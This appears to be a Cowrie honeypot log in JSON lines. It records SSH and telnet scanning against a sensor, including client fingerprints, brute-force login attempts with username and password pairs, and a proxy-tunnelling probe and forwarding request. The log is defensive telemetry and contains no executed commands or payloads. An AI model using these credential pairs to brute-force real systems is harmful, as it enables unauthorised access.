{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41710,"dst_ip":"1.2.3.4","dst_port":22,"session":"a80eead74877","protocol":"ssh","message":"New connection: 212.227.125.160:41710 (1.2.3.4:22) [session: a80eead74877]","sensor":"my-vps","timestamp":"2025-08-26T08:35:27.216292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-26T08:35:27.216856Z","src_ip":"212.227.125.160","session":"a80eead74877"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-26T08:35:27.271602Z","src_ip":"212.227.125.160","session":"a80eead74877"}
{"eventid":"cowrie.login.failed","username":"service","password":"service","message":"login attempt [service/service] failed","sensor":"my-vps","timestamp":"2025-08-26T08:35:27.571440Z","src_ip":"212.227.125.160","session":"a80eead74877"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:28.877019Z","src_ip":"212.227.125.160","session":"a80eead74877"}
{"eventid":"cowrie.session.connect","src_ip":"143.198.64.110","src_port":43216,"dst_ip":"1.2.3.4","dst_port":22,"session":"92c9aebca784","protocol":"ssh","message":"New connection: 143.198.64.110:43216 (1.2.3.4:22) [session: 92c9aebca784]","sensor":"my-vps","timestamp":"2025-08-26T08:35:29.153504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:35:29.341015Z","src_ip":"143.198.64.110","session":"92c9aebca784"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T08:35:29.341672Z","src_ip":"143.198.64.110","session":"92c9aebca784"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41714,"dst_ip":"1.2.3.4","dst_port":22,"session":"7248e1defa77","protocol":"ssh","message":"New connection: 212.227.125.160:41714 (1.2.3.4:22) [session: 7248e1defa77]","sensor":"my-vps","timestamp":"2025-08-26T08:35:31.877435Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:32.962567Z","src_ip":"212.227.125.160","session":"7248e1defa77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58424,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff34099b8d1a","protocol":"ssh","message":"New connection: 212.227.125.160:58424 (1.2.3.4:22) [session: ff34099b8d1a]","sensor":"my-vps","timestamp":"2025-08-26T08:35:34.212049Z"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:35.186927Z","src_ip":"212.227.125.160","session":"ff34099b8d1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58426,"dst_ip":"1.2.3.4","dst_port":22,"session":"5adac866ca31","protocol":"ssh","message":"New connection: 212.227.125.160:58426 (1.2.3.4:22) [session: 5adac866ca31]","sensor":"my-vps","timestamp":"2025-08-26T08:35:36.689785Z"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:37.341897Z","src_ip":"143.198.64.110","session":"92c9aebca784"}
{"eventid":"cowrie.client.version","version":"CONNECT 196.251.69.116:80 HTTP/1.0","message":"Remote SSH version: CONNECT 196.251.69.116:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-26T08:35:37.556669Z","src_ip":"212.227.125.160","session":"5adac866ca31"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:37.558505Z","src_ip":"212.227.125.160","session":"5adac866ca31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58428,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c0de347620a","protocol":"ssh","message":"New connection: 212.227.125.160:58428 (1.2.3.4:22) [session: 3c0de347620a]","sensor":"my-vps","timestamp":"2025-08-26T08:35:39.297323Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:40.457699Z","src_ip":"212.227.125.160","session":"3c0de347620a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58438,"dst_ip":"1.2.3.4","dst_port":22,"session":"0586241fe9e6","protocol":"ssh","message":"New connection: 212.227.125.160:58438 (1.2.3.4:22) [session: 0586241fe9e6]","sensor":"my-vps","timestamp":"2025-08-26T08:35:42.410001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-26T08:35:42.411503Z","src_ip":"212.227.125.160","session":"0586241fe9e6"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-26T08:35:42.460980Z","src_ip":"212.227.125.160","session":"0586241fe9e6"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-26T08:35:42.955363Z","src_ip":"212.227.125.160","session":"0586241fe9e6"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:44.391892Z","src_ip":"212.227.125.160","session":"0586241fe9e6"}
{"eventid":"cowrie.session.connect","src_ip":"125.130.116.243","src_port":38483,"dst_ip":"1.2.3.4","dst_port":23,"session":"475c4b930753","protocol":"telnet","message":"New connection: 125.130.116.243:38483 (1.2.3.4:23) [session: 475c4b930753]","sensor":"my-vps","timestamp":"2025-08-26T08:37:25.306761Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:37:50.044767Z","src_ip":"212.227.235.229","session":"d5b508560979"}
{"eventid":"cowrie.session.closed","duration":180.2840654850006,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:37:50.049853Z","src_ip":"212.227.235.229","session":"d5b508560979"}
{"eventid":"cowrie.session.closed","duration":30.549813270568848,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:37:55.856463Z","src_ip":"125.130.116.243","session":"475c4b930753"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52946,"dst_ip":"1.2.3.4","dst_port":22,"session":"1725a1773227","protocol":"ssh","message":"New connection: 217.72.205.35:52946 (1.2.3.4:22) [session: 1725a1773227]","sensor":"my-vps","timestamp":"2025-08-26T08:40:26.472574Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:40:26.477459Z","src_ip":"217.72.205.35","session":"1725a1773227"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":54914,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d69d1f169e7","protocol":"ssh","message":"New connection: 45.88.8.215:54914 (1.2.3.4:22) [session: 7d69d1f169e7]","sensor":"my-vps","timestamp":"2025-08-26T08:41:36.711703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:41:36.994540Z","src_ip":"45.88.8.215","session":"7d69d1f169e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:41:36.996447Z","src_ip":"45.88.8.215","session":"7d69d1f169e7"}
{"eventid":"cowrie.login.success","username":"root","password":"Lochan@123","message":"login attempt [root/Lochan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:41:38.660317Z","src_ip":"45.88.8.215","session":"7d69d1f169e7"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:41:39.092108Z","src_ip":"45.88.8.215","session":"7d69d1f169e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35263,"dst_ip":"1.2.3.4","dst_port":23,"session":"e64eadc83a86","protocol":"telnet","message":"New connection: 212.227.125.160:35263 (1.2.3.4:23) [session: e64eadc83a86]","sensor":"my-vps","timestamp":"2025-08-26T08:43:10.699430Z"}
{"eventid":"cowrie.session.closed","duration":30.611046075820923,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:43:41.310404Z","src_ip":"212.227.125.160","session":"e64eadc83a86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41269,"dst_ip":"1.2.3.4","dst_port":23,"session":"019a81247bbf","protocol":"telnet","message":"New connection: 212.227.125.160:41269 (1.2.3.4:23) [session: 019a81247bbf]","sensor":"my-vps","timestamp":"2025-08-26T08:43:52.947293Z"}
{"eventid":"cowrie.session.closed","duration":13.585788011550903,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:44:06.532974Z","src_ip":"212.227.125.160","session":"019a81247bbf"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":56856,"dst_ip":"1.2.3.4","dst_port":22,"session":"722aaff68812","protocol":"ssh","message":"New connection: 45.88.8.186:56856 (1.2.3.4:22) [session: 722aaff68812]","sensor":"my-vps","timestamp":"2025-08-26T08:44:48.519029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:44:49.126273Z","src_ip":"45.88.8.186","session":"722aaff68812"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:44:49.128454Z","src_ip":"45.88.8.186","session":"722aaff68812"}
{"eventid":"cowrie.login.success","username":"root","password":"Reset123!","message":"login attempt [root/Reset123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:44:51.879246Z","src_ip":"45.88.8.186","session":"722aaff68812"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:44:52.550812Z","src_ip":"45.88.8.186","session":"722aaff68812"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34070,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa38ead7cdef","protocol":"ssh","message":"New connection: 212.227.125.160:34070 (1.2.3.4:22) [session: fa38ead7cdef]","sensor":"my-vps","timestamp":"2025-08-26T08:45:28.284428Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:45:28.285827Z","src_ip":"212.227.125.160","session":"fa38ead7cdef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34311,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd718d22e44f","protocol":"ssh","message":"New connection: 212.227.125.160:34311 (1.2.3.4:22) [session: bd718d22e44f]","sensor":"my-vps","timestamp":"2025-08-26T08:45:28.396567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:45:28.397385Z","src_ip":"212.227.125.160","session":"bd718d22e44f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T08:45:28.511558Z","src_ip":"212.227.125.160","session":"bd718d22e44f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:45:28.855130Z","src_ip":"212.227.125.160","session":"bd718d22e44f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T08:45:28.970028Z","session":"bd718d22e44f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:46:38.397768Z","src_ip":"212.227.125.160","session":"bd718d22e44f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13202,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f71982edb57","protocol":"ssh","message":"New connection: 212.227.235.229:13202 (1.2.3.4:22) [session: 8f71982edb57]","sensor":"my-vps","timestamp":"2025-08-26T08:46:51.989392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T08:46:51.991061Z","src_ip":"212.227.235.229","session":"8f71982edb57"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T08:46:52.099199Z","src_ip":"212.227.235.229","session":"8f71982edb57"}
{"eventid":"cowrie.login.failed","username":"admin","password":"smarty","message":"login attempt [admin/smarty] failed","sensor":"my-vps","timestamp":"2025-08-26T08:46:52.618920Z","src_ip":"212.227.235.229","session":"8f71982edb57"}
{"eventid":"cowrie.login.failed","username":"admin","password":"slayers","message":"login attempt [admin/slayers] failed","sensor":"my-vps","timestamp":"2025-08-26T08:46:53.730498Z","src_ip":"212.227.235.229","session":"8f71982edb57"}
{"eventid":"cowrie.login.failed","username":"admin","password":"skins","message":"login attempt [admin/skins] failed","sensor":"my-vps","timestamp":"2025-08-26T08:46:54.841675Z","src_ip":"212.227.235.229","session":"8f71982edb57"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sk8ordie","message":"login attempt [admin/sk8ordie] failed","sensor":"my-vps","timestamp":"2025-08-26T08:46:55.952574Z","src_ip":"212.227.235.229","session":"8f71982edb57"}
{"eventid":"cowrie.login.failed","username":"admin","password":"singh","message":"login attempt [admin/singh] failed","sensor":"my-vps","timestamp":"2025-08-26T08:46:57.064054Z","src_ip":"212.227.235.229","session":"8f71982edb57"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:46:58.175174Z","src_ip":"212.227.235.229","session":"8f71982edb57"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56628,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b65b381adcc","protocol":"ssh","message":"New connection: 217.72.205.35:56628 (1.2.3.4:22) [session: 9b65b381adcc]","sensor":"my-vps","timestamp":"2025-08-26T08:47:04.597567Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:47:04.598857Z","src_ip":"217.72.205.35","session":"9b65b381adcc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50614,"dst_ip":"1.2.3.4","dst_port":23,"session":"d208e8171b86","protocol":"telnet","message":"New connection: 212.227.125.160:50614 (1.2.3.4:23) [session: d208e8171b86]","sensor":"my-vps","timestamp":"2025-08-26T08:47:10.270011Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47054,"dst_ip":"1.2.3.4","dst_port":23,"session":"9bc142e0e03b","protocol":"telnet","message":"New connection: 212.227.125.160:47054 (1.2.3.4:23) [session: 9bc142e0e03b]","sensor":"my-vps","timestamp":"2025-08-26T08:49:09.915064Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:49:10.001593Z","src_ip":"212.227.125.160","session":"9bc142e0e03b"}
